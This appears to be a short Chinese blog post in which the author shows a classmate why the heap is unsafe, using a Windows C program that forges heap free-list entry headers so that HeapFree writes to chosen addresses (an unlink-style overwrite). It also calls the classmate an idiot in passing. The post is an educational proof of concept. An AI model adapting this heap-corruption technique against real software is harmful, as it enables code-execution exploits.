前几日 研究堆本希望叫我同学明白 堆是不安全的 他不信我 讲又讲不明白他 于是狂骂之
今日无聊 写了个程序给他讲 白痴终于开窍了。。。
基本理论情况是满清楚的 一直没有写过着得东西
本不想搞这些东西 最终也抵制不了自己的好奇 人啊
真是个贱东西 me too
———————————————————————————
#include "stdafx.h"
#include <windows.h>
#define OFFSET 1024
#define Anyaddr 0x410020
#define Anydate 0x410000
#define HEAP_ENTRY_BUSY 0x01
#define HEAP_ENTRY_EXTRA_PRESENT 0x02
#define HEAP_ENTRY_FILL_PATTERN 0x04
#define HEAP_ENTRY_VIRTUAL_ALLOC 0x08
#define HEAP_ENTRY_LAST_ENTRY 0x10
#define HEAP_ENTRY_SETTABLE_FLAG1 0x20
#define HEAP_ENTRY_SETTABLE_FLAG2 0x40
#define HEAP_ENTRY_SETTABLE_FLAG3 0x80
#define HEAP_ENTRY_SETTABLE_FLAGS 0xE0
typedef struct _HEAP_FREE_ENTRY {
USHORT Size;
USHORT PreviousSize;
UCHAR SegmentIndex;
UCHAR Flags;
UCHAR Index;
UCHAR Mask;
LIST_ENTRY FreeList;
} HEAP_FREE_ENTRY, *PHEAP_FREE_ENTRY;
int _tmain(int argc, _TCHAR* argv[])
{
HANDLE hHeap;
char buff[20];
char *buf1,*buf2,*buf3;
PHEAP_FREE_ENTRY pfheap_entry;
hHeap = HeapCreate(HEAP_GENERATE_EXCEPTIONS, 0x10000, 0xfffff);
buf1 = (char*)HeapAlloc(hHeap,0,OFFSET);
memset(buff,0,20);
memset(buf1,0,OFFSET);
buf2 = (char*)HeapAlloc(hHeap,0,OFFSET);
memset(buf2,0,OFFSET);
pfheap_entry = (PHEAP_FREE_ENTRY)&buff;
pfheap_entry->PreviousSize = 0x83;
pfheap_entry->Size = 0x5;
pfheap_entry->SegmentIndex = 0x0;
pfheap_entry->Flags = HEAP_ENTRY_SETTABLE_FLAG2 | HEAP_ENTRY_BUSY;
pfheap_entry->Index = 0x18;
pfheap_entry->Mask = 0x0;
memcpy(buf1+1024+16,pfheap_entry,sizeof(_HEAP_FREE_ENTRY ));
memcpy(buf2+16,buf1+1024,8);
pfheap_entry = (PHEAP_FREE_ENTRY)&buff;
pfheap_entry->PreviousSize = 0x2;
pfheap_entry->Size = 0x83-0x5;
pfheap_entry->SegmentIndex = 0x0;
pfheap_entry->Flags = 0x44;
pfheap_entry->Index = 0x18;
pfheap_entry->Mask = 0x0;
pfheap_entry->FreeList.Flink = (LIST_ENTRY*)Anyaddr;
pfheap_entry->FreeList.Blink = (LIST_ENTRY*)Anydate;
memcpy(buf2+32,pfheap_entry,sizeof(_HEAP_FREE_ENTRY ));
HeapFree(hHeap, 0, buf1);
HeapFree(hHeap, 0, buf2);
return 0;
}
————————————————————————-——————————
如果修改了管理地址需要在return前修复次地址
否则不能返回 或不可预料的错误